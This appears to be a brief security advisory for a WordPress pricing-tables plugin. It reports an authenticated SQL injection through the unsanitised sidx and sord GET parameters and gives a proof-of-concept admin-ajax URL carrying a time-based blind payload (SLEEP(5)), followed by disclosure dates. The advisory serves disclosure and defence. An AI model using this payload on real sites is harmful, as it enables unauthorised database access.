The GET parameter sidx and sord are used in a SQL statement without being sanitised when searching for pricing tables in the dashboard, leading to an authenticated SQL Injection issues.
https://example.com/wp-admin/admin-ajax.php?mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=4af102a025&search%5Btext_like%5D=aa&_search=false&nd=1612782186309&rows=10&page=0&sord=desc&sidx=id%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
2021-02-08 (about 1 years ago)
2021-02-08 (about 1 years ago)
2021-02-10 (about 1 years ago)